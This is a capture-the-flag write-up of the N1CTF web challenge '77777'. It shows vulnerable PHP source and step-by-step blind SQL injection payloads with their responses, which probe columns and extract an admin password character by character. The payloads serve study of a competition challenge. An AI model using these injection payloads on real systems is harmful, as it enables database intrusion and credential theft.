Rating:

# ▼▼▼77777(Web:172/517=33.2%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
"77777" is my girlfriend's nickname,have fun xdd:)
hk node: http://47.75.14.48
cn node: http://47.97.168.223
(Two challenge servers are identical, use either of them.)

【Hints】
If you think you have got the flag and have trouble submitting the flag, please try again with lowercase letters in the flag and N1CTF{} wrapped.

For those who suffers from getting blocked, try http://47.97.168.223:23333 and http://47.75.14.48:23333 instead. We sincerely apologize for the inconvenience caused.
```

---

```
U can update my points in Profile.
and And the flag is `admin's password`:)
```

---

The source code on the site was published in the image.

```
function updata_point($p,$points){
global $link;
$q = sprintf("UPDATE users SET points=%d%s",
$p,waf($points));
if(!$query = mysqli_query($link,$q)) return FALSE;
return TRUE;
}
if(!update_point($_POST['flag'],$_POST['hi']))
echo 'sorry';
```

SQL injection available as `$points`!! However, WAF exists!!

---

In the comparison of 1,0, the content displayed in the response is not stable as it is calculated from seconds.

Blind SQL injection at 1,0 looks difficult.

---

`flag=1&hi=1|(select NULL)` ⇒ <grey>My Points</grey> | `NULL`

`flag=t&hi=0||(select case when 1 then NULL else 1 end)` ⇒<grey>My Points</grey> | `NULL`

`flag=t&hi=0||(select case when 0 then NULL else 1 end)` ⇒<grey>My Points</grey> | `1`

Blind SQL injection using NULL is possible.

---

**【Identify column names】**

`flag=t&hi=0||(select case when 0 then NULL else 1 end where ttttt like 1)` ⇒<grey>My Points</grey> | `1`

`flag=t&hi=0||(select case when 0 then NULL else 1 end where id like 1)` ⇒ <grey>My Points</grey> | `NULL`

Column name can be specified

The `id` column exists

---

Similarly carried out

The `username` column exists

The `password` column exists

In summary, it turned out that `id`, `username`, `password` exists

---

**【Distinction between uppercase and lowercase letters】**

We decide to use `ord()` to distinguish between uppercase and lowercase letters

`0*(select case when (ord(substr(password,1,1))>1) then NULL else 1 end)`

---

**【Confirm the number of data】**

`flag=1&hi=1*(select case when (select id<2) then NULL else 1 end)` ⇒<grey>My Points</grey> | `NULL`

`flag=1&hi=1*(select case when (select id>1) then NULL else 1 end)` ⇒<grey>My Points</grey> | `11`

Apparently there seems to be only one data. It was difficult if it was 2 pieces.

---

**【exploit】**

```
flag=1&hi=1*(select case when ord(substr(password,1,1))>104 then NULL else 1 end) 104 h
flag=1&hi=1*(select case when ord(substr(password,2,1))>101 then NULL else 1 end) 100 e
flag=1&hi=1*(select case when ord(substr(password,3,1))>108 then NULL else 1 end) 108 l
flag=1&hi=1*(select case when ord(substr(password,4,1))>108 then NULL else 1 end) 108 l
flag=1&hi=1*(select case when ord(substr(password,5,1))>111 then NULL else 1 end) 111 o
flag=1&hi=1*(select case when ord(substr(password,6,1))>99 then NULL else 1 end) 99 c
flag=1&hi=1*(select case when ord(substr(password,7,1))>116 then NULL else 1 end) 116 t
flag=1&hi=1*(select case when ord(substr(password,8,1))>102 then NULL else 1 end) 102 f
flag=1&hi=1*(select case when ord(substr(password,9,1))>101 then NULL else 1 end) 101 e
flag=1&hi=1*(select case when ord(substr(password,10,1))>114 then NULL else 1 end) 114 r
flag=1&hi=1*(select case when ord(substr(password,11,1))>50 then NULL else 1 end) 50 2
flag=1&hi=1*(select case when ord(substr(password,12,1))>51 then NULL else 1 end) 51 3
flag=1&hi=1*(select case when ord(substr(password,13,1))>51 then NULL else 1 end) 51 3
flag=1&hi=1*(select case when ord(substr(password,14,1))>51 then NULL else 1 end) 51 3
flag=1&hi=1*(select case when ord(substr(password,15,1))>51 then NULL else 1 end) 51 3
flag=1&hi=1*(select case when ord(substr(password,16,1))>20 then NULL else 1 end)
```

`N1CTF{helloctfer23333}`